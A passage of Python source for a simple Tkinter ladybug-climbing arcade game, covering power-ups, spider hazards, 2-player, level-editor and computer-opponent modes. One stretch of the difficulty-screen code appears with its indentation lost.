        canvas.create_image(self.x, self.y, image=data.umbrella)
def hitInvincible(data):
    """Activate the umbrella (invincibility) power-up when a player touches one.

    Bug fix: iterates over a snapshot of data.invincible — removing from the
    list while iterating it skipped the next power-up.
    """
    for powerUp in list(data.invincible):
        if data.mode == "1Player" or data.mode == "levelCreated":
            if (data.cy - data.r <= powerUp.y <= data.cy + data.r and
                    data.cx - data.r <= powerUp.x <= data.cx + data.r):
                data.beInvincible = True
                data.start = data.cy    # where the effect began (for expiry)
                data.invincible.remove(powerUp)
        if data.mode == "2Player" or data.mode == "AI":
            # player 1
            if (data.player1Y - data.r <= powerUp.y <= data.player1Y + data.r and
                    data.player1X - data.r <= powerUp.x <= data.player1X + data.r):
                data.Invincible1 = True
                data.start1 = data.player1Y
                data.invincible.remove(powerUp)
            # player 2
            if (data.player2Y - data.r <= powerUp.y <= data.player2Y + data.r and
                    data.player2X - data.r <= powerUp.x <= data.player2X + data.r):
                data.Invincible2 = True
                data.start2 = data.player2Y
                data.invincible.remove(powerUp)
class ScaryBug(object):
    """Spider hazard: climbs the screen (2P/AI) or side-steps lanes (solo modes)."""
    def __init__(self, x, y):
        self.x = x
        self.y = y
        self.speed = 25      # vertical climb per tick (raised to 35 in 2P/AI)
    def draw(self, canvas, data):
        canvas.create_image(self.x, self.y, image=data.spider)
    def onTimerFired(self, data):
        if data.mode == "2Player" or data.mode == "AI":
            self.speed = 35
            self.y -= self.speed
        # BUG FIX: the original condition parsed as
        #   mode == "1Player" or (mode == "levelCreated" and time % 8 == 0)
        # because `and` binds tighter than `or`, so in 1-player mode the
        # spider side-stepped every tick instead of every 8th.
        if (data.mode == "1Player" or data.mode == "levelCreated") and \
                data.time % 8 == 0:
            # pick a random side-step, bouncing off the lane boundaries
            side = random.choice(data.sides)
            if side == "l":
                if self.x - data.lane >= data.Player1Min:
                    self.x -= data.lane
                else:
                    self.x += data.lane
            elif side == "r":
                if self.x + data.lane <= data.Player1Max:
                    self.x += data.lane
                else:
                    self.x -= data.lane
def hitScaryBug(data):
    """Spider contact: instant death in solo modes, instant win for the rival in 2P/AI."""
    for bug in data.scaryBug:
        if data.mode == "1Player" or data.mode == "levelCreated":
            # solo modes use a 1.5x radius for the larger spider sprite
            nearY = data.cy - 1.5 * data.r <= bug.y <= data.cy + 1.5 * data.r
            nearX = data.cx - 1.5 * data.r <= bug.x <= data.cx + 1.5 * data.r
            if nearY and nearX:
                data.hit = True
                data.lives = 0
                data.levelEditorLives = 0
        if data.mode == "2Player" or data.mode == "AI":
            if (data.player1Y - data.r <= bug.y <= data.player1Y + data.r and
                    data.player1X - data.r <= bug.x <= data.player1X + data.r):
                data.winner = "player2"
            if (data.player2Y - data.r <= bug.y <= data.player2Y + data.r and
                    data.player2X - data.r <= bug.x <= data.player2X + data.r):
                data.winner = "player1"
def drawPowerups(canvas, data):
    """Draw every active spider, hour-glass and umbrella sprite."""
    # Order matters only for overlap: spiders first, umbrellas last on top.
    for sprite in data.scaryBug + data.powerUps + data.invincible:
        sprite.draw(canvas, data)
def drawHome(canvas, data):
    """Draw the home button shown in the corner of every screen."""
    canvas.create_image(data.homeX, data.homeY, image=data.home)
def checkHome(event, data):
    """Reset the whole game to the splash screen if the home button was clicked."""
    insideY = data.homeY - data.r <= event.y <= data.homeY + data.r
    insideX = data.homeX - data.r <= event.x <= data.homeX + data.r
    if insideY and insideX:
        init(data)
def coconutShot(data):
    """Spawn this tick's raindrops for 1-player mode.

    Spawn frequency rises with the level; drops appear both outside and
    inside the playable band plus occasionally on the lane edges.
    """
    if data.level >0 and data.pauseDrops == False:
        if data.time%int(data.levelMax/data.level) == 0 or data.time%6==0:
            #increases drops as level increases
            xPosition1 = random.randint(0,data.Player1Min-data.buffer)
            xPosition2 = random.randint(data.Player1Max+data.buffer,
                                        data.width +data.buffer)
            data.coconuts.append(Coconuts(xPosition1,0))
            data.coconuts.append(Coconuts(xPosition2,0))
            xPosition4 = random.randint(data.Player1Min-data.buffer,
                                        data.Player1Max+data.buffer)
            data.coconuts.append(Coconuts(xPosition4,0))
        if data.time %5 ==0:
            xPosition3 = random.randint(0, data.Player1Min-data.buffer)
            data.coconuts.append(Coconuts(xPosition3,0))
        if data.time % int(24/data.level) ==0:
            # occasionally drop exactly on a band edge, on a random side
            side = random.choice(data.sides)
            if side == "l":
                data.coconuts.append(Coconuts(data.Player1Min,0))
            elif side =="r":
                data.coconuts.append(Coconuts(data.Player1Max,0))
        powerUpCoconutShot(data)
def powerUpCoconutShot(data):
    """Spawn 1-player power-ups and spiders on staggered timers."""
    #adds powerUps
    #magic #s toallow for powerups to be added at different times
    if data.time % 60 == 0 and data.time%120 !=0:
        Position = random.choice(data.spotList)
        data.powerUps.append(PowerUps(Position,0))
    if data.time%50 == 0:
        Position = random.choice(data.spotList)
        data.invincible.append(Invincible(Position,0))
    if data.time %100==0:
        # spiders start at the bottom (y=750) and climb
        Position = random.choice(data.spotList)
        data.scaryBug.append(ScaryBug(Position,750))
def playerKeyPressed(event, data):
    """Handle 1-player keys: restart, lane movement, and win-screen name entry.

    Bug fix: the win-screen score entry used ``scoreList += (score, name)``,
    which extends the list with two separate scalar elements; it now appends
    the (score, name) pair as one record.
    """
    # "r" restarts only while a game is still in progress
    if data.level < data.levelMax and event.keysym == "r":
        init(data)
    # half-lane horizontal movement, clamped to the playable band
    if event.keysym == "Left" and data.cx >= data.Player1Min + (data.lane / 2):
        data.cx -= data.lane / 2
    elif event.keysym == "Right" and data.cx <= data.Player1Max:
        data.cx += data.lane / 2
    if data.level >= data.levelMax:
        # player has won: collect a name for the scoreboard
        if len(event.keysym) == 1 and len(data.name) < 15:
            data.name += event.keysym
        if event.keysym == "BackSpace":
            data.name = data.name[0:-1]
        if event.keysym == "Return":
            data.scoreList.append((data.score, data.name))
            # persist "score,name" at the end of the saved-score text
            writeFile("score.txt",
                      data.savedScores + str(data.score) + "," + data.name + "\n")
            data.mode = "scoreboard"
def playerMousePressed(event, data):
    """Clicks on the 1-player screen only matter for the home button."""
    checkHome(event, data)
def playerTimerFired(data):
    """Per-tick update for 1-player mode: climb, spawn, move drops, collide."""
    #actually pauses, and moves drops/player
    if data.hit== False and data.level<data.levelMax:
        data.cy-=data.speed
        if data.time%5 ==0: data.score +=data.level
        if data.cy < 15: #basically made it to the top
            data.level +=1
            data.cy = data.Player1Max + 10
            data.speed +=2
        if data.cy>40: #so drops you can't see don't hit you
            data.time +=1
            if data.pauseDrops !=True: coconutShot(data)
        for powerUp in data.powerUps: powerUp.onTimerFired(data)
        hitPause(data)
        for powerUp in data.invincible: powerUp.onTimerFired(data)
        hitInvincible(data)
        for bug in data.scaryBug: bug.onTimerFired(data)
        hitScaryBug(data)
        for coconut in data.coconuts:
            # only want drops to move if not paused
            if data.pauseDrops == False: coconut.onTimerFired(data)
        if data.beInvincible == False:hit(data)
        if data.start != None:
            if abs(data.start-data.cy) >= 120:
                #to limit time for powerups to be active
                data.pauseDrops, data.beInvincible = False, False
def playerRedrawAll(canvas, data):
    """Draw the 1-player screen: tree, drops, power-ups, bug, HUD, end screens."""
    # magic #s mainly for screen placement
    canvas.create_image(data.width/2, data.height/2, image=data.background)
    canvas.create_line(0,20, data.width, 20)
    for coconut in data.coconuts: coconut.draw(canvas)
    drawPowerups(canvas, data)
    canvas.create_image(data.cx, data.cy, image=data.ladyBug)
    canvas.create_text(data.width/6,50, text ="Level: %d" %data.level,
                       font = "Arial 18 bold", fill = "yellow")
    canvas.create_text(data.width/6,80, text ="Score: %d" %data.score,
                       font = "Arial 18 bold", fill = "yellow")
    canvas.create_text(2*data.width/3,660,
                       text ="""The greater the level, the more points get
                       added to your score!""",
                       font = "Arial 15 bold", fill = "yellow")
    # death screen overlays everything once the spider got the bug
    if data.hit== True:
        canvas.create_rectangle(0,0,data.width, data.height, fill = "black")
        canvas.create_image(data.width/2, data.height/2, image=data.deadScreen)
        canvas.create_text(data.width/2,data.height/4,
                           text = "You Lose! Better Luck Next Time!",
                           font = "Helvetica 23 bold", fill = "yellow")
        canvas.create_text(data.width/2,280, text ="Score: %d" %data.score,
                           font = "Arial 13 bold", fill = "yellow")
    if data.level >= 8: madeIt(canvas, data)
    drawHome(canvas, data)
def madeIt(canvas, data):# magic #s mainly for screen placement
    """Draw the 1-player victory screen with the name-entry box."""
    canvas.create_rectangle(0,0, data.width, data.height, fill = "black")
    canvas.create_image(data.width/2, data.height/2, image=data.winScreen)
    canvas.create_image(300, 320, image=data.winBug)
    canvas.create_text(data.width/2,70, text = "You Made it!",
                       font = "Arial 23 bold", fill = "yellow")
    canvas.create_text(data.width/2,100, text ="Score: %d" %data.score,
                       font = "Arial 15 bold", fill = "yellow")
    canvas.create_text(data.width/2,375, text ="Congrats! Enter your Name!",
                       font = "Arial 15 bold", fill = "yellow")
    # name typed so far (collected by playerKeyPressed)
    canvas.create_rectangle(data.width/2 - 50, 400, data.width/2+50, 450,
                            fill = "white")
    canvas.create_text(data.width/2, 425, text = data.name)
####################################
# 2Player mode
####################################
def drop2Player(data):
    """Spawn mirrored raindrops for both halves of the 2-player screen."""
    #adds drops when not paused
    #magic #s are position of where drops are starting
    if data.winner ==None and data.pauseDrops == False:
        if data.time%15==0:
            xPosition1 = random.randint(0,385)
            if abs(xPosition1 - 100)>25 and abs(xPosition1 - 360)>25:
                #so random drops don't interfere with the lane ones
                if data.pause1Drop != True:
                    data.coconuts1.append(Coconuts(xPosition1,0))
                if data.pause2Drop != True:
                    # same drop mirrored into the right half (+410 offset)
                    data.coconuts2.append(Coconuts(xPosition1 +410,0))
        if data.time % 12 ==0:
            # lane drops on a random matching side of both halves
            side = random.choice(data.sides)
            if side == "l":
                if data.pause1Drop != True:
                    data.coconuts1.append(Coconuts(140,0))
                if data.pause2Drop != True:
                    data.coconuts2.append(Coconuts(540,0))
            elif side =="r":
                if data.pause1Drop !=True:data.coconuts1.append(Coconuts(344,0))
                if data.pause2Drop!=True:data.coconuts2.append(Coconuts(755,0))
        powerupDrop2Player(data)
def powerupDrop2Player(data):
    """Spawn power-ups and spiders at matching positions on both halves."""
    #adds powerups on both screens (in the same position)
    if data.time % 45 == 0 and data.time%90 !=0:
        #randomize placement
        side = random.choice(data.sides)
        if side == "l":
            if data.pause1Drop!=True:data.powerUps.append(PowerUps(140,0))
            if data.pause2Drop!=True:data.powerUps.append(PowerUps(540,0))
        elif side =="r":
            if data.pause1Drop!=True:data.powerUps.append(PowerUps(344,0))
            if data.pause2Drop!=True:data.powerUps.append(PowerUps(755,0))
    if data.time%60 == 0:
        side = random.choice(data.sides)
        if side == "l":
            if data.pause1Drop!=True:data.invincible.append(Invincible(140,0))
            if data.pause2Drop!=True:data.invincible.append(Invincible(540,0))
        elif side =="r":
            if data.pause1Drop!=True:data.invincible.append(Invincible(344,0))
            if data.pause2Drop!=True:data.invincible.append(Invincible(755,0))
    if data.time %90==0:
        # spiders start at the bottom and climb toward the players
        side = random.choice(data.sides)
        if side == "l":
            data.scaryBug.append(ScaryBug(140,750))
            data.scaryBug.append(ScaryBug(540,750))
        elif side =="r":
            data.scaryBug.append(ScaryBug(344,750))
            data.scaryBug.append(ScaryBug(755,750))
def twoPlayerKeyPressed(event, data):
    """Key controls for both bugs: a/d for player 1, arrows for player 2, r restarts."""
    if event.keysym == "r":
        init(data)
    if data.winner != None:
        return  # round is over: ignore movement keys
    key = event.keysym
    # each player toggles between a fixed left lane and a fixed right lane
    if key == "a" and data.onLeft1 == False:
        data.onLeft1 = True
        data.player1X = 150
    if key == "d" and data.onLeft1 == True:
        data.onLeft1 = False
        data.player1X = 330
    if key == "Left" and data.onLeft2 == False:
        data.onLeft2 = True
        data.player2X = 550
    if key == "Right" and data.onLeft2 == True:
        data.onLeft2 = False
        data.player2X = 750
def twoPlayerMousePressed(event, data):
    """Only the home button is clickable during a 2-player round."""
    checkHome(event, data)
def twoPlayerTimerFired(data):
    """Per-tick update for 2-player mode: climb both bugs, spawn, collide.

    NOTE(review): data.time is incremented in both players' blocks, so it
    advances up to twice per tick — confirm whether that doubling of the
    spawn clock is intentional.
    """
    if data.winner == None:
        data.player1Y-=data.speed
        #<15 signifies that lady bug reached the top
        if data.player1Y < 15 and data.player2Y >15:
            data.winner= "player1"
        if data.player1Y>40:
            data.time +=1
            drop2Player(data)
        data.player2Y-=data.speed
        if data.player2Y < 15 and data.player1Y> 15:
            data.winner= "player2"
        if data.player2Y>40:
            data.time +=1
            drop2Player(data)
        if data.player1Y < 15 and data.player2Y <15:
            data.winner = "tie"
        for powerUp in data.powerUps: powerUp.onTimerFired(data)
        hitPause(data)
        for powerUp in data.invincible:powerUp.onTimerFired(data)
        hitInvincible(data)
        for bug in data.scaryBug:bug.onTimerFired(data)
        hitScaryBug(data)
        powerupTimerFired(data)
def powerupTimerFired(data):
    """Move both players' drops (unless paused) and expire active power-ups."""
    for coconut in data.coconuts1:
        if data.pause1Drop == False:
            coconut.onTimerFired(data)
    hit2Player(data)
    for coconut in data.coconuts2:
        if data.pause2Drop == False:
            coconut.onTimerFired(data)
    if data.start1 != None:
        # to make powerups only active for set amount of time
        if abs(data.start1-data.player1Y) >= 120:
            data.pause1Drop = False
            data.Invincible1 = False
    if data.start2 != None:
        if abs(data.start2-data.player2Y) >= 120:
            data.pause2Drop = False
            data.Invincible2 = False
def twoPlayerRedrawAll(canvas, data):
    """Draw the split-screen 2-player view: two half-trees, drops, both bugs."""
    #magic #s for placement on screen
    canvas.create_image(data.width/4, data.height/2, image=data.halfBackground)
    canvas.create_image(3*data.width/4, data.height/2,image=data.halfBackground)
    # vertical divider between the two halves, finish line at the top
    canvas.create_line(data.width/2, 0, data.width/2, data.height, width = 10)
    canvas.create_line(0,20, data.width, 20)
    for coconut in data.coconuts1: coconut.draw(canvas)
    for coconut in data.coconuts2: coconut.draw(canvas)
    drawPowerups(canvas, data)
    canvas.create_image(data.player1X, data.player1Y, image=data.ladyBug)
    canvas.create_image(data.player2X, data.player2Y, image=data.ladyBug)
    canvas.create_text(50,40, text = "Player 1",font = "Arial 15 bold",
                       fill = "yellow")
    canvas.create_text(450,40, text = "Player 2",font = "Arial 15 bold",
                       fill = "yellow")
    winner(canvas, data)
    drawHome(canvas, data)
def winner(canvas, data):
    """Draw the end-of-round banner once a 2-player winner (or tie) is decided."""
    banners = {
        "player1": "You Made it! Player 1",
        "player2": "You Made it! Player 2",
        "tie": "Tie! You Both Made it!",
    }
    message = banners.get(data.winner)
    if message is None:
        return  # round still in progress
    # black out the playfield, then show the tree-top win scene
    canvas.create_rectangle(0, 0, data.width, data.height, fill="black")
    canvas.create_image(data.width / 2, data.height / 2, image=data.winScreen)
    canvas.create_image(300, 320, image=data.winBug)
    canvas.create_text(data.width / 2, 100, text=message,
                       font="Arial 23 bold", fill="yellow")
####################################
# editor mode
####################################
def editorKeyPressed(event, data):
    """The editor screen only reacts to "r", which restarts the whole game."""
    if event.keysym != "r":
        return
    init(data)
def editorMousePressed(event, data):
    """Handle editor clicks: player-speed row here, other rows via helpers."""
    #check for click on button for your speed
    checkHome(event, data)
    # first button row is vertically centred on y == data.easyY
    if data.easyY-data.r<= event.y <= data.easyY +data.r:
        if data.easyX-2*data.r<= event.x<=data.easyX+2*data.r:
            data.yourSpeed = "slow"
            data.slow = data.click
            data.medium, data.fast = data.notClick, data.notClick
        if data.medX-2*data.r<= event.x<=data.medX+2*data.r:
            data.yourSpeed = "medium"
            data.medium = data.click
            data.slow, data.fast = data.notClick, data.notClick
        if data.hardX-2*data.r<= event.x<=data.hardX+2*data.r:
            data.yourSpeed = "fast"
            data.fast = data.click
            data.slow, data.medium = data.notClick, data.notClick
    checkMiddle(event, data)
    checkLast(event, data)
def checkMiddle(event, data):
    """Handle clicks on the middle (rain speed) row of editor buttons."""
    # This row of buttons is vertically centred on y == data.medX.
    if not (data.medX - data.r <= event.y <= data.medX + data.r):
        return
    if data.easyX - 2 * data.r <= event.x <= data.easyX + 2 * data.r:
        data.rainSpeed = "drizzle"
        data.drizzle = data.click
        data.rain = data.notClick
        data.thunderstorm = data.notClick
    if data.medX - 2 * data.r <= event.x <= data.medX + 2 * data.r:
        data.rainSpeed = "rain"
        data.rain = data.click
        data.drizzle = data.notClick
        data.thunderstorm = data.notClick
    if data.hardX - 2 * data.r <= event.x <= data.hardX + 2 * data.r:
        data.rainSpeed = "thunderstorm"
        data.thunderstorm = data.click
        data.drizzle = data.notClick
        data.rain = data.notClick
def checkLast(event, data):
    """Handle the power-up yes/no row and the Enter button in the editor."""
    if data.last - data.r <= event.y <= data.last + data.r:
        # "Yes" is drawn at x == data.easyY, "No" at x == data.last.
        if data.easyY - 2 * data.r <= event.x <= data.easyY + 2 * data.r:
            data.powerUpsEditor = True
            data.yes = data.click
            data.no = data.notClick
        if data.last - 2 * data.r <= event.x <= data.last + 2 * data.r:
            data.powerUpsEditor = False
            data.no = data.click
            data.yes = data.notClick
    # Enter only works once changeEnter() has lit it up.
    if data.enter == data.click:
        if (data.enterX - data.r <= event.y <= data.enterX + data.r and
                data.medX - 2 * data.r <= event.x <= data.medX + 2 * data.r):
            data.mode = "levelCreated"
def drawButtons(canvas, data):
    """Draw the editor's three button rows (also sets data.font/data.fill,
    which changeEnter() below relies on)."""
    #makes each button
    data.font, data.fill = "Helvetica 13 bold", "yellow"
    canvas.create_text(data.medX,data.YST, text= "Your Speed:",
                       font = data.font,fill =data.fill)
    canvas.create_image(data.easyX,data.easyY, image = data.slow)
    canvas.create_text(data.easyX,data.easyY, text="Slow", font = data.font)
    canvas.create_image(data.medX,data.easyY, image = data.medium)
    canvas.create_text(data.medX,data.easyY, text="Medium", font = data.font)
    canvas.create_image(data.hardX,data.easyY, image = data.fast)
    canvas.create_text(data.hardX,data.easyY, text="Fast",font = data.font)
    # rain-speed row is centred on y == data.medX (a reused x constant)
    canvas.create_image(data.easyX,data.medX, image = data.drizzle)
    canvas.create_text(data.medX,data.RST, text= "Rain Speed:",
                       font = data.font,fill =data.fill)
    canvas.create_text(data.easyX,data.medX, text="Drizzle",font = data.font)
    canvas.create_image(data.medX,data.medX, image = data.rain)
    canvas.create_text(data.medX,data.medX, text="Rain",font = data.font)
    canvas.create_image(data.hardX,data.medX, image = data.thunderstorm)
    canvas.create_text(data.hardX,data.medX, text="Heavy",font = data.font)
    canvas.create_text(data.medX,data.PUT, text= "PowerUps?",
                       font = data.font,fill =data.fill)
    canvas.create_image(data.easyY,data.last, image = data.yes)
    canvas.create_text(data.easyY,data.last, text="Yes",font = data.font)
    canvas.create_image(data.last,data.last, image = data.no)
    canvas.create_text(data.last,data.last, text="No",font = data.font)
    changeEnter(canvas, data)
def changeEnter(canvas, data):
    """Light up the Enter button once every editor option has been chosen."""
    allChosen = (data.powerUpsEditor != None and
                 data.yourSpeed != None and
                 data.rainSpeed != None)
    if allChosen:
        data.enter = data.click
    # NOTE: relies on data.font having been set by drawButtons().
    canvas.create_image(data.medX, data.enterX, image=data.enter)
    canvas.create_text(data.medX, data.enterX, text="Enter", font=data.font)
def editorTimerFired(data):
    """Animate the editor screen's decorative background rain."""
    data.editorTime += 1
    if data.editorTime % 2 == 0:
        rainDrop(data)
    for backgroundDrop in data.editorDrops:
        backgroundDrop.onTimerFired(data)
def rainDrop(data):
    """Add one background raindrop at a random x across the top of the screen."""
    #background drops
    data.editorDrops.append(Coconuts(random.randint(0, data.width), 0))
def editorRedrawAll(canvas, data):
    """Draw the editor screen: background, rain, title, option buttons."""
    canvas.create_image(data.width/2, data.height/2, image=data.background)
    canvas.create_image(data.width/2, data.height/2, image=data.tbg)
    for drop in data.editorDrops:
        drop.draw(canvas)
    canvas.create_text(data.width/2, data.S_P -10, text = "Edit Your Level!",
                       font="Arial 23 bold", fill = "yellow")
    drawButtons(canvas, data)
    drawHome(canvas, data)
####################################
# levelCreated mode
####################################
def setEverything(data):
    """Translate the editor's choices into the numeric game parameters."""
    playerSpeeds = {"slow": 6, "medium": 10, "fast": 14}
    # smaller rSpeed => drops are spawned more often (it divides the timer)
    rainPeriods = {"thunderstorm": 7, "rain": 10, "drizzle": 13}
    if data.yourSpeed in playerSpeeds:
        data.speed = playerSpeeds[data.yourSpeed]
    if data.rainSpeed in rainPeriods:
        data.rSpeed = rainPeriods[data.rainSpeed]
def levelCoconutShot(data):
    """Spawn raindrops for the custom (level editor) round.

    data.rSpeed comes from setEverything(); smaller values mean the timer
    divides more often and the rain is heavier.
    """
    #adding drops
    if data.levelEditorLives >0:
        if data.time%int(0.35*data.rSpeed) == 0:
            xPosition1 = random.randint(0,data.Player1Min-data.buffer)
            xPosition2 = random.randint(770, 870)
            xPosition3 = random.randint(220,770)
            data.coconuts.append(Coconuts(xPosition3,0))
            data.coconuts.append(Coconuts(xPosition1,0))
            data.coconuts.append(Coconuts(xPosition2,0))
        if data.time % int(0.55*data.rSpeed) ==0:
            xPosition3 = random.randint(0, 220)
            xPosition5 = random.randint(220,770)
            data.coconuts.append(Coconuts(xPosition3,0))
            data.coconuts.append(Coconuts(xPosition5,0))
        if data.time % int(data.rSpeed) ==0:
            # occasional edge drops on a random side
            side = random.choice(data.sides)
            if side == "l":
                data.coconuts.append(Coconuts(3*data.width/8-20,0))
            elif side =="r":
                data.coconuts.append(Coconuts(7*data.width/8+40,0))
            xPosition4= random.randint(220,770)
            data.coconuts.append(Coconuts(xPosition4,0))
        levelPowerUp(data)
def levelPowerUp(data):
    """Spawn editor-round power-ups and spiders, only if the player chose 'Yes'."""
    # adding power-ups only if clicked yes
    if data.powerUpsEditor == True:
        if data.time % 20 == 0 and data.time%40 !=0:
            Position = random.choice(data.spotList)
            data.powerUps.append(PowerUps(Position,0))
        if data.time%30 == 0:
            Position = random.choice(data.spotList)
            data.invincible.append(Invincible(Position,0))
        if data.time %35==0:
            # spiders start at the bottom (y=750) and climb
            Position = random.choice(data.spotList)
            data.scaryBug.append(ScaryBug(Position,750))
def levelCreatedKeyPressed(event, data):
    """Movement keys for the custom (level editor) round; "r" restarts."""
    if event.keysym == "r":
        init(data)
    if data.levelEditorLives <= 0:
        return  # dead: no more movement
    halfLane = data.lane / 2
    # hard-coded 317/740 bounds keep the bug inside the playable band
    if event.keysym == "Left" and data.cx >= 317:
        data.cx -= halfLane
    elif event.keysym == "Right" and data.cx <= 740:
        data.cx += halfLane
def levelCreatedMousePressed(event, data):
    """Only the home button is clickable during a custom round."""
    checkHome(event, data)
def levelCreatedTimerFired(data):
    """Per-tick update for the custom round: climb, spawn, move, collide."""
    # re-applied each tick so editor choices always take effect
    setEverything(data)
    if data.levelEditorLives>0:
        data.cy-=data.speed
        if data.cy < 15:
            # reached the top: winEditor() keys off level > 1
            data.level +=1
        if data.cy>40:
            data.time +=1
            if data.pauseDrops !=True: levelCoconutShot(data)
        if data.powerUpsEditor == False:
            for coconut in data.coconuts: coconut.onTimerFired(data)
            hit(data)
        if data.powerUpsEditor == True:
            for powerUp in data.powerUps: powerUp.onTimerFired(data)
            hitPause(data)
            for powerUp in data.invincible: powerUp.onTimerFired(data)
            hitInvincible(data)
            for bug in data.scaryBug: bug.onTimerFired(data)
            hitScaryBug(data)
            for coconut in data.coconuts:
                if data.pauseDrops == False:coconut.onTimerFired(data)
            if data.beInvincible == False: hit(data)
            if data.start != None:
                #to make powerups only active for set amount of time
                if abs(data.start-data.cy) >= 120:
                    data.pauseDrops, data.beInvincible = False, False
def levelCreatedRedrawAll(canvas, data):
    """Draw the custom round: tree, drops, bug, lives HUD, end screens."""
    canvas.create_image(data.width/2, data.height/2, image=data.background)
    canvas.create_line(0,20, data.width, 20)
    for coconut in data.coconuts: coconut.draw(canvas)
    if data.powerUpsEditor == True: drawPowerups(canvas, data)
    canvas.create_image(data.cx, data.cy, image=data.ladyBug)
    canvas.create_text(data.width/6,100,
                       text ="Total Lives: %d" %data.levelEditorLives,
                       font = "Arial 20 bold", fill = "yellow")
    canvas.create_text(data.width/2,660,
                       text ="""You lose a life for hitting a drop
                       & don't get eaten!""",
                       font = "Arial 15 bold", fill = "yellow")
    # death screen once all lives are gone
    if data.levelEditorLives <=0:
        canvas.create_rectangle(0,0, data.width, data.height, fill = "black")
        canvas.create_image(data.width/2, data.height/2, image=data.deadScreen)
        canvas.create_text(data.width/2,data.height/4,
                           text = "You Lose! Better Luck Next Time!",
                           font = "Helvetica 23 bold", fill = "yellow")
    if data.level > 1: winEditor(canvas, data)
    drawHome(canvas, data)
def winEditor(canvas, data):
    """Victory screen for the custom level (the bug reached the top)."""
    centerX = data.width / 2
    canvas.create_rectangle(0, 0, data.width, data.height, fill="black")
    canvas.create_image(centerX, data.height / 2, image=data.winScreen)
    canvas.create_image(300, 320, image=data.winBug)
    canvas.create_text(centerX, 100, text="You Made it!",
                       font="Arial 23 bold", fill="yellow")
####################################
# AI Difficulty Mode
####################################
def difficultyKeyPressed(event, data):
    """The difficulty screen only reacts to "r", which restarts the game."""
    if event.keysym != "r":
        return
    init(data)
def drawDifficulties(canvas, data):
canvas.create_text(data.medX,data.AITY, text= "Computer Difficulty:",
font="Arial 23 bold", fill = "yellow")
canvas.create_image(data.easyX, data.easyY, image=data.slow)
canvas.create_text(data.easyX,data.easyY, text="Easy")
canvas.create_image(data.medX, data.easyY, image=data.medium)
canvas.create_text(data.medX,data.easyY, text="Medium")
canvas.create_image(data.hardX, data.easyY, image=data.fast)
canvas.create_text(data.hardX,data.easyY, text="Hard")
if data.difficulty !=None:
data.enter = data.click
canvas.create_image(data.medX, data.enterY, image=data.enter)
canvas.create_text(data.medX,data.enterY, text="Enter")
def difficultyMousePressed(event, data):
#sets up buttons to customize
checkHome(event, data)
if data.easyY-data.r<= event.y <= data.easyY +data.r:
if data.easyX-2*data.r<= event.x<=data.easyX+2*data.r:
data.difficulty = data.difS
data.slow = data.click
data.medium, data.fast = data.notClick, data.notClick
if data.medX-2*data.r<= event.x<=data.medX+2*data.r:
data.difficulty = data.difM
data.medium = data.click
data.slow, data.fast = data.notClick, data.notClick
if data.hardX-2*data.r<= event.x<=data.hardX+2*data.r:
data.difficulty = data.difH
data.fast = data.click
data.slow, data.medium = data.notClick, data.notClick
if data.enter == data.click:
if data.enterY-data.r<=event.y<=data.enterY+data.r:
if data.medX-2*data.r<= event.x<=data.medX+2*data.r:
data.mode="AI"
def difficultyTimerFired(data):
# makes normal background rain
data.editorTime += 1
if data.editorTime %2 ==0:
rainDrop(data)
for drop in data.editorDrops:
drop.onTimerFired(data)
def rainDrop(data):
xPosition = random.randint(0,data.width)
data.editorDrops.append(Coconuts(xPosition,0))
def difficultyRedrawAll(canvas, data):
canvas.create_image(data.width/2, data.height/2, image=data.background)
canvas.create_image(data.width/2, data.height/2, image=data.tbg)
for drop in data.editorDrops:
drop.draw(canvas)
drawDifficulties(canvas, data)
drawHome(canvas, data)
####################################
# AI mode
####################################
def hitAI1(data, distance):
    """Drive the computer player: dodge approaching drops/spiders and apply hits.

    For each drop in data.coconutsAI1 that is within `distance` above the AI
    bug (or when a spider threatens, via AISwitchBug), the AI switches columns
    with a probability controlled by data.difficulty.  Any drop overlapping the
    bug's bounding box knocks it down 50 px and is consumed.
    """
    # Iterate over a snapshot: the body removes from data.coconutsAI1, and
    # removing from a list while iterating it silently skips the next element.
    for coconut in list(data.coconutsAI1):
        # so AI switches by itself
        if (data.player1Y-data.r - coconut.y <= distance) and \
            data.switchOnProgress == False:
            if coconut.x >= data.player1X-data.r and \
                coconut.x <= data.player1X+data.r or AISwitchBug(data, distance) == True:
                testInt = random.randint(0, 9)
                # to have different levels of difficulty: higher
                # data.difficulty => the AI dodges more often
                if testInt <= data.difficulty:
                    data.switchOnProgress = True
                    if data.player1X == 150:
                        data.player1X = 340
                    else:
                        data.player1X = 150
                    data.switchOnProgress = False
        # Collision check: drop overlaps the bug's bounding box.
        if coconut.y >= data.player1Y-data.r and coconut.y <= data.player1Y+data.r:
            if coconut.x >= data.player1X-data.r and \
                coconut.x <= data.player1X+data.r:
                data.player1Y += 50
                data.coconutsAI1.remove(coconut)
def AISwitchBug(data, distance):
    """Tell the AI whether a spider threatens its current column.

    Returns True when some spider is within `distance` above the AI bug and
    horizontally inside the bug's column (and no switch is in progress);
    otherwise falls through and returns None.
    """
    near_line = data.player1Y - data.r
    lo = data.player1X - data.r
    hi = data.player1X + data.r
    for spider in data.scaryBug:
        close_enough = (near_line - spider.y <= distance)
        if close_enough and not data.switchOnProgress and lo <= spider.x <= hi:
            return True
def hitAI2(data, distance):
    """Apply drop collisions to the human player (right lane).

    Each drop overlapping the player's bounding box knocks the player down
    50 px and is consumed.  `distance` is unused; it is kept so the signature
    mirrors hitAI1 (callers pass it at both call sites).
    """
    # check if human controlled player hits drops.  Iterate over a snapshot:
    # removing from a list while iterating it silently skips the next element.
    for coconut in list(data.coconutsAI2):
        if coconut.y >= data.player2Y-data.r and coconut.y <= data.player2Y+data.r:
            if coconut.x >= data.player2X-data.r and \
                coconut.x <= data.player2X+data.r:
                data.player2Y += 50
                data.coconutsAI2.remove(coconut)
def coconutShotAI(data):
    """Spawn water drops for both lanes while the race is undecided.

    The same random x is reused for both lanes (right lane shifted +410 px)
    so both players face mirrored patterns; a lane stops receiving drops
    while its pauseNDrop power-up is active.
    """
    if data.winner ==None:
        # randomize position of drops off of tree; skip x near the two trunks
        if data.time%15==0:
            xPosition1 = random.randint(0,385)
            if abs(xPosition1 - 100)>40 and abs(xPosition1 - 360)>40:
                if data.pause1Drop != True:
                    data.coconutsAI1.append(Coconuts(xPosition1,0))
                if data.pause2Drop != True:
                    data.coconutsAI2.append(Coconuts(xPosition1 +410,0))
        # More frequent drops near the outer edges of each half-screen.
        if data.time%8 ==0:
            xPosition2 = random.randint(0,80)
            xPosition3 = random.randint(364, 385)
            if data.pause1Drop != True:
                data.coconutsAI1.append(Coconuts(xPosition2,0))
